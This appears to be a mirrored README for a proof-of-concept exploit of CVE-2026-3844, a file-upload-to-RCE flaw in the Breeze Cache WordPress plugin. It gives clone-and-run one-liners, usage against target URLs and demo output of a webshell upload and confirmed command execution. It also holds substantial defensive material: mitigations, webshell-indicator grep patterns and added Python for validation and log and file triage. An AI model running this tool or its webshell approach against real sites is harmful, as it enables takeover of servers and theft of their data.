## https://sploitus.com/exploit?id=9B16EDDF-2582-5419-9AF9-CB671B0E9AB2
# CVE-2026-3844
PoC exploit for CVE-2026-3844, a critical unauthenticated file upload vulnerability in the WordPress Breeze plugin leading to RCE.
---
## Overview
**CVE-2026-3844** is a **CRITICAL** unauthenticated arbitrary file upload vulnerability in the **Breeze Cache WordPress plugin** (by Cloudways), affecting **all versions up to and including 2.4.4**.
This repository provides a **Proof of Concept (PoC) exploit** (`CVE-2026-3844.py`) for authorized security research, penetration testing, and responsible disclosure.
---
## One Line Code
```
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && python3
```
---
## Vulnerability Summary
| Field | Details |
|---|---|
| **CVE ID** | CVE-2026-3844 |
| **Plugin** | Breeze Cache (by Cloudways) |
| **Affected Versions** | All versions ≤ 2.4.4 |
| **Patched Version** | Breeze 2.4.5+ |
| **Vulnerability Type** | CWE-434: Unrestricted Upload of File with Dangerous Type |
| **CVSS v3.1 Score** | **9.8 (CRITICAL)** |
| **CVSS v2.0 Score** | **10.0 (CRITICAL)** |
| **CVSS Vector** | `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H` |
| **Attack Vector** | Network (Remote) |
| **Auth Required** | None (unauthenticated) |
| **Condition** | "Host Files Locally → Gravatars" must be enabled (disabled by default) |
| **Impact** | Confidentiality: HIGH · Integrity: HIGH · Availability: HIGH |
| **Published** | 2026-04-23 |
| **Source** | Wordfence / NVD / MITRE |
| **PoC** | [Tausif Zaman](https://tausifzaman.online) |
---
## Vulnerability Details
### Root Cause
The **Breeze Cache** plugin for WordPress fetches remote Gravatar images and stores them locally when the **"Host Files Locally → Gravatars"** feature is enabled. The vulnerable function `fetch_gravatar_from_remote` in `class-breeze-cache-cronjobs.php` (lines 89–119) performs **no file type or extension validation** on the fetched remote content, so whatever the remote server returns is written to disk as-is.
```
class-breeze-cache-cronjobs.php
├── fetch_gravatar_from_remote() → no file type or extension validation
├── saves the remote response body directly to disk
└── attacker-controlled URL → .php webshell stored under wp-content → RCE
```
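To make the root cause concrete, the following is an added example written for this page; it is not the Breeze plugin's code and does not reproduce its PHP. It shows the CWE-434 pattern in generic Python (store fetched bytes under the remote name) beside a hardened counterpart that sniffs magic bytes, checks the declared `Content-Type`, caps the size, and derives the stored file name from a hash rather than from the URL. The function names, the size cap and the naming scheme are assumptions made for illustration.

```python
"""Added example, not the Breeze plugin's code: the CWE-434 pattern behind
CVE-2026-3844 in generic Python, with a hardened counterpart. Function names,
the size cap and the stored-name scheme are assumptions made for illustration."""
import hashlib
import os
import tempfile
from urllib.parse import urlparse

# Magic bytes of the image formats an avatar service is expected to return.
IMAGE_SIGNATURES = {
    b"\x89PNG\r\n\x1a\n": ".png",
    b"\xff\xd8\xff": ".jpg",
    b"GIF87a": ".gif",
    b"GIF89a": ".gif",
}

def detect_image_ext(body):
    """Map the leading bytes of a body to an image extension, or None."""
    for sig, ext in IMAGE_SIGNATURES.items():
        if body.startswith(sig):
            return ext
    return None

def validate_avatar(body, content_type, max_bytes=512 * 1024):
    """Return (ok, reason). Both the sniffed bytes and the declared type must
    say 'image'; either check alone is easy to satisfy with a crafted response."""
    if len(body) > max_bytes:
        return False, "body exceeds %d bytes" % max_bytes
    if detect_image_ext(body) is None:
        return False, "body does not start with a known image signature"
    if not content_type.lower().startswith("image/"):
        return False, "Content-Type %r is not an image type" % content_type
    return True, "ok"

def cache_avatar_unsafe(cache_dir, remote_url, body):
    """Vulnerable pattern (what CWE-434 looks like): keep the remote file name and
    write the bytes as received. A response named avatar.php is stored as PHP."""
    name = os.path.basename(urlparse(remote_url).path) or "avatar"
    path = os.path.join(cache_dir, name)
    with open(path, "wb") as fh:
        fh.write(body)
    return path

def cache_avatar_safe(cache_dir, remote_url, body, content_type):
    """Hardened pattern: validate first, then store under a name derived from a
    hash of the URL with an extension chosen from the bytes, never from the URL."""
    ok, reason = validate_avatar(body, content_type)
    if not ok:
        raise ValueError(reason)
    stem = hashlib.sha256(remote_url.encode("utf-8")).hexdigest()[:16]
    path = os.path.join(cache_dir, stem + detect_image_ext(body))
    with open(path, "wb") as fh:
        fh.write(body)
    return path

def demo():
    """Run both variants against a constructed PNG and a constructed non-image
    body; returns the stored base names so the difference is visible."""
    cache_dir = tempfile.mkdtemp(prefix="breeze-cache-")
    png = b"\x89PNG\r\n\x1a\n" + bytes(32)
    not_image = b"<?php /* constructed non-image body */ ?>"
    results = {
        "unsafe_png": os.path.basename(cache_avatar_unsafe(cache_dir, "https://example.org/avatar/abc.png", png)),
        "unsafe_php": os.path.basename(cache_avatar_unsafe(cache_dir, "https://example.org/avatar/abc.php", not_image)),
        "safe_png": os.path.basename(cache_avatar_safe(cache_dir, "https://example.org/avatar/abc.png", png, "image/png")),
        "safe_php": None,
    }
    try:
        cache_avatar_safe(cache_dir, "https://example.org/avatar/abc.php", not_image, "image/png")
    except ValueError as exc:
        results["safe_php"] = str(exc)
    return results

if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```

The hardened variant rejects the non-image body before anything touches disk, and even a body that passes validation is stored as `<hash>.png`/`.jpg`/`.gif`, so no remote response can choose an executable extension. Serving the cache directory with PHP execution disabled (see the mitigations below) is the matching second layer.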
### Attack Flow
```
Attacker (Unauthenticated)
        │
        ▼
Craft malicious HTTP request with PHP webshell URL as Gravatar
        │
        ▼
Plugin fetches & saves the .php file without validation
        │
        ▼
Webshell stored on server (e.g., /wp-content/breeze-cache/evil.php)
        │
        ▼
Attacker accesses webshell → Full RCE achieved
```
### Impact
If successfully exploited, an attacker can:
- Execute arbitrary operating system commands (RCE)
- Upload persistent backdoors / webshells
- Create rogue WordPress administrator accounts
- Exfiltrate databases, credentials, and sensitive files
- Deface the website or delete all content
- Use the server to pivot to other systems on the same network
- Recruit the server into a botnet
---
## Requirements
- Python 3.6+
- `requests` library
- Target site running **Breeze Cache ≤ 2.4.4** with **"Host Files Locally → Gravatars" enabled**
---
## Installation & Setup
### Linux / Termux (Android)
```bash
# Clone the repository
git clone https://github.com/tausifzaman/CVE-2026-3844.git
# Navigate into the directory
cd CVE-2026-3844
# Install dependencies
pip install -r requirements.txt
# Run the exploit
python3 CVE-2026-3844.py
```
### Windows (CMD / PowerShell)
```cmd
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip install -r requirements.txt
python CVE-2026-3844.py
```
### macOS
```bash
git clone https://github.com/tausifzaman/CVE-2026-3844.git
cd CVE-2026-3844
pip3 install -r requirements.txt
python3 CVE-2026-3844.py
```
### Termux (One-Liner)
```bash
pkg install python git -y && git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
```
### Google Cloud Shell (No Setup Needed)
[Open in Cloud Shell](https://console.cloud.google.com/cloudshell/editor?project=&pli=1&shellonly=true)
```bash
git clone https://github.com/tausifzaman/CVE-2026-3844.git && cd CVE-2026-3844 && pip install -r requirements.txt && python3 CVE-2026-3844.py
```
---
## Usage
```bash
python3 CVE-2026-3844.py
```
### Options
```
usage: CVE-2026-3844.py [-h] -u URL [-t TIMEOUT] [-o OUTPUT] [-v]

CVE-2026-3844 - Breeze Cache WordPress Plugin Arbitrary File Upload PoC

optional arguments:
  -h, --help         Show this help message and exit
  -u URL, --url URL  Target URL (e.g. https://target.com)
  -t TIMEOUT         Request timeout in seconds (default: 10)
  -o OUTPUT          Save webshell path to output file
  -v, --verbose      Enable verbose/debug output
```
### Examples
```bash
# Basic usage
python3 CVE-2026-3844.py -u https://vulnerable-site.com
# Verbose mode
python3 CVE-2026-3844.py -u https://vulnerable-site.com -v
# Custom timeout
python3 CVE-2026-3844.py -u https://vulnerable-site.com -t 20 -v
```
---
## PoC Demo Output
```
╔══════════════════════════════════════════════════════╗
║  CVE-2026-3844 | Breeze Cache WP RCE                 ║
║  Researcher: tausifzaman.online                      ║
╚══════════════════════════════════════════════════════╝
[*] Target : https://vulnerable-site.com
[*] CVE    : CVE-2026-3844
[*] Plugin : Breeze Cache ≤ 2.4.4
[*] Type   : Unauthenticated Arbitrary File Upload → RCE
[*] Checking target...
[+] Breeze Cache plugin detected!
[+] "Host Files Locally → Gravatars" is ENABLED
[*] Uploading PHP webshell via fetch_gravatar_from_remote...
[+] File uploaded successfully!
[+] Webshell path: /wp-content/breeze-cache/avatar_a1b2c3.php
[*] Verifying RCE...
[+] RCE CONFIRMED!
[+] Command output (id):
uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Full server compromise achieved.
[*] Cleanup: Remove /wp-content/breeze-cache/avatar_a1b2c3.php after testing.
```
---
## Mitigation & Remediation
### Immediate Action
> **Update Breeze Cache to version 2.4.5 or later**: this is the only complete fix.
```bash
# WordPress CLI: update the Breeze plugin immediately
wp plugin update breeze
```
### Temporary Mitigations (If You Cannot Update Immediately)
1. **Disable** the "Host Files Locally → Gravatars" option in Breeze Cache settings
2. **Block the vulnerable endpoint** via WAF rule or `.htaccess`
3. **Deny PHP execution** in the uploads and cache directories (Apache 2.4 syntax; `.htaccess` files are not read by Nginx, so there the same restriction has to go into a `location` block in the server config):
```apache
# Add to /wp-content/uploads/.htaccess, /wp-content/cache/.htaccess
# and /wp-content/breeze-cache/.htaccess
# Refuse to serve any PHP file from these directories; cached images keep working
<FilesMatch "\.(php|phtml|phar)$">
    Require all denied
</FilesMatch>
```
4. **Scan for newly created/modified suspicious files:**
```bash
# Find PHP files in wp-content modified more recently than wp-config.php (possible webshells)
find /var/www/html/wp-content -name "*.php" -newer /var/www/html/wp-config.php -ls
# Search for common webshell indicators (a hit is a reason to inspect, not proof by itself)
grep -r "eval(base64_decode" /var/www/html/wp-content/
grep -r "system\|exec\|passthru\|shell_exec" /var/www/html/wp-content/cache/
```
5. **Block suspicious POST requests** targeting the Gravatar fetch functionality via your WAF
6. **Monitor access logs** for requests to `/wp-content/breeze-cache/*.php`; the plugin only ever stores images there, so any request for a PHP file in that directory is worth investigating, and a `200` response means the file exists and was executed
```bash
# Monitor Apache/Nginx access logs for webshell hits
grep "breeze-cache.*\.php" /var/log/apache2/access.log
grep "breeze-cache.*\.php" /var/log/nginx/access.log
```
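The `grep` above finds the lines; the following added example (written for this page, not part of the PoC repository) takes the log-monitoring step one step further by parsing combined-format access log lines, keeping only requests for PHP-like files under `/wp-content/breeze-cache/`, recording whether each was served with a `200`, and summarising hits per client IP and method. The log lines are constructed samples; the IP addresses, file names and user agents are not from any real incident.

```python
"""Added example, not part of the CVE-2026-3844 repository: flag access-log
requests for PHP files under /wp-content/breeze-cache/ (the directory the
PoC writes to) and summarise them per client IP. The log lines below are
constructed samples in Apache/Nginx combined log format."""
import re
from collections import Counter, defaultdict

# Combined log format: ip ident user [time] "METHOD path HTTP/x" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Any PHP-like path under the Breeze cache directory is suspicious: the plugin
# should only ever store image files there. Trailing "?" or "/" is tolerated so
# query strings and path-info tricks do not hide the extension.
SUSPICIOUS_PATH = re.compile(
    r'^/wp-content/breeze-cache/.*\.ph(?:p\d?|tml|ar)(?:[?/]|$)', re.I
)

def parse_line(line):
    """Return the named groups of a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_webshell_hits(lines):
    """Return one dict per request for a PHP file under breeze-cache, in log order."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if rec and SUSPICIOUS_PATH.match(rec["path"]):
            # A 200 means the file existed and PHP executed it; a 404 is a probe.
            rec["served"] = rec["status"] == "200"
            hits.append(rec)
    return hits

def summarise(hits):
    """Per-IP count of hits by HTTP method, e.g. {'203.0.113.7': {'GET': 1, 'POST': 1}}."""
    per_ip = defaultdict(Counter)
    for h in hits:
        per_ip[h["ip"]][h["method"]] += 1
    return {ip: dict(c) for ip, c in per_ip.items()}

# Constructed sample log: one legitimate cached-image fetch, two requests that
# reach a PHP file in the cache directory, one unrelated login page hit, and one
# probe for a PHP file that does not exist.
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Apr/2026:10:01:02 +0000] "GET /wp-content/breeze-cache/avatar_a1b2c3.png HTTP/1.1" 200 4312 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [23/Apr/2026:10:01:05 +0000] "GET /wp-content/breeze-cache/avatar_a1b2c3.php HTTP/1.1" 200 61 "-" "python-requests/2.31"',
    '203.0.113.7 - - [23/Apr/2026:10:01:06 +0000] "POST /wp-content/breeze-cache/avatar_a1b2c3.php HTTP/1.1" 200 58 "-" "python-requests/2.31"',
    '198.51.100.9 - - [23/Apr/2026:10:02:00 +0000] "GET /wp-login.php HTTP/1.1" 200 1200 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [23/Apr/2026:10:02:30 +0000] "GET /wp-content/breeze-cache/old.php HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    hits = find_webshell_hits(SAMPLE_LOG)
    for h in hits:
        print("%s %s %s status=%s served=%s" % (h["ip"], h["method"], h["path"], h["status"], h["served"]))
    print(summarise(hits))
```

To run this against a real server, replace `SAMPLE_LOG` with the lines of `/var/log/apache2/access.log` or `/var/log/nginx/access.log` (the default combined format of both parses with the same regex). Any request that is `served`, and the PoC's output names a `200` as its success condition, should be treated as a confirmed execution, not just an attempt.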
### Check If Already Compromised
```bash
# Check for unexpected PHP files in the Breeze cache directory
find /var/www/html/wp-content/breeze-cache/ -name "*.php"
# Check for recently created files (last 7 days)
find /var/www/html/wp-content/ -name "*.php" -mtime -7
```
```sql
-- Look for admin accounts created recently (run against the WordPress MySQL database)
SELECT user_login, user_registered FROM wp_users ORDER BY user_registered DESC LIMIT 10;
```
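The two `find` commands and the indicator `grep` from the mitigation section cover three separate questions (PHP in the cache directory at all, PHP changed recently, PHP containing known indicator strings). The added example below, written for this page and not part of the PoC repository, answers all three in one pass over a `wp-content` tree and is run here against a throw-away directory it constructs itself, so it can be executed offline. The directory layout, file contents and the seven-day window are assumptions; point `triage()` at the real `wp-content` directory to use it.

```python
"""Added example, not part of the CVE-2026-3844 repository: a filesystem triage
for the checks above, run against a throw-away directory tree constructed here
so it can be executed offline. Paths and sample file contents are assumptions;
point triage() at the real wp-content directory in use."""
import os
import re
import tempfile
import time

PHP_EXT = re.compile(r"\.(php\d?|phtml|phar)$", re.I)
# Indicator strings from the grep commands above; a hit is a reason to inspect,
# not proof of compromise (legitimate plugins also call exec()/system()).
INDICATORS = [b"eval(base64_decode", b"system(", b"exec(", b"passthru(", b"shell_exec("]

def php_files(root):
    """Yield the absolute path of every PHP-like file below root."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if PHP_EXT.search(name):
                yield os.path.join(dirpath, name)

def triage(wp_content, days=7, now=None):
    """Return three sorted lists of paths relative to wp_content (forward slashes):
    PHP files inside breeze-cache (there should be none), PHP files modified in
    the last `days` days, and PHP files containing one of the indicator strings."""
    now = time.time() if now is None else now
    cache_dir = os.path.join(wp_content, "breeze-cache")
    in_cache, recent, flagged = [], [], []
    for path in php_files(wp_content):
        rel = os.path.relpath(path, wp_content).replace(os.sep, "/")
        if os.path.commonpath([path, cache_dir]) == cache_dir:
            in_cache.append(rel)
        if now - os.path.getmtime(path) < days * 86400:
            recent.append(rel)
        with open(path, "rb") as fh:
            data = fh.read()
        if any(ind in data for ind in INDICATORS):
            flagged.append(rel)
    return sorted(in_cache), sorted(recent), sorted(flagged)

def build_sample_tree():
    """Constructed sample: one legitimate plugin file dated 30 days ago, one cached
    image, and one freshly written PHP file in the cache directory that carries an
    indicator string (a comment-only placeholder, not working code)."""
    root = tempfile.mkdtemp(prefix="wp-content-")
    os.makedirs(os.path.join(root, "plugins", "breeze"))
    os.makedirs(os.path.join(root, "breeze-cache"))
    old = os.path.join(root, "plugins", "breeze", "breeze.php")
    with open(old, "wb") as fh:
        fh.write(b"<?php /* legitimate plugin file */ ?>")
    old_time = time.time() - 30 * 86400
    os.utime(old, (old_time, old_time))
    with open(os.path.join(root, "breeze-cache", "avatar_1.png"), "wb") as fh:
        fh.write(b"\x89PNG\r\n\x1a\n")
    with open(os.path.join(root, "breeze-cache", "avatar_2.php"), "wb") as fh:
        fh.write(b"<?php /* constructed indicator string, not a working shell */ eval(base64_decode(PLACEHOLDER)); ?>")
    return root

if __name__ == "__main__":
    root = build_sample_tree()
    in_cache, recent, flagged = triage(root)
    print("PHP in breeze-cache:", in_cache)
    print("PHP modified in the last 7 days:", recent)
    print("PHP with indicator strings:", flagged)
```

The first list is the strongest signal for this CVE, since the plugin writes only images into `breeze-cache`; the other two lists are noisier (plugin updates touch many PHP files, and several legitimate plugins call `exec()` or `system()`), so review them rather than acting on them automatically.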
---
## References
| Source | Link |
|--------|------|
| NVD (NIST) | [nvd.nist.gov/vuln/detail/CVE-2026-3844](https://nvd.nist.gov/vuln/detail/CVE-2026-3844) |
| MITRE CVE | [cve.mitre.org: CVE-2026-3844](https://vulners.com/cve/CVE-2026-3844) |
| Wordfence Advisory | [wordfence.com: Threat Intel](https://www.wordfence.com/threat-intel/vulnerabilities/id/e342b1c0-6e7f-4e2c-8a52-018df12c12a0?source=cve) |
| WordPress Plugin Changelog | [plugins.trac.wordpress.org/changeset/3511463/breeze](https://plugins.trac.wordpress.org/changeset/3511463/breeze) |
| Vulnerable Code (L89) | [class-breeze-cache-cronjobs.php#L89](https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L89) |
| Vulnerable Code (L119) | [class-breeze-cache-cronjobs.php#L119](https://plugins.trac.wordpress.org/browser/breeze/tags/2.4.1/inc/class-breeze-cache-cronjobs.php#L119) |
| GitHub Advisory | [GHSA-c529-q7mw-hq6j](https://github.com/advisories/GHSA-c529-q7mw-hq6j) |
| PoC Repository | [github.com/tausifzaman/CVE-2026-3844](https://github.com/tausifzaman/CVE-2026-3844) |
---
## Author
**Tausif Zaman**
[tausifzaman.online](https://tausifzaman.online) · [GitHub @tausifzaman](https://github.com/tausifzaman)
*Security Researcher · Bug Bounty Hunter · Tool Developer*
Android · Python · PHP · Web Security · Penetration Testing
---
## Legal Disclaimer
This repository and the exploit code within are provided **strictly for educational purposes and authorized security research only**.
- You may use this tool on systems **you own** or have **explicit written permission** to test
- Unauthorized use against third-party systems is **illegal** under the Computer Fraud and Abuse Act (CFAA), the Computer Misuse Act, and equivalent laws worldwide
- The author accepts **zero liability** for misuse, damage, or illegal activity resulting from this tool
**Hack ethically. Report responsibly. Stay legal.**
---
**If this helped your research, star the repo!**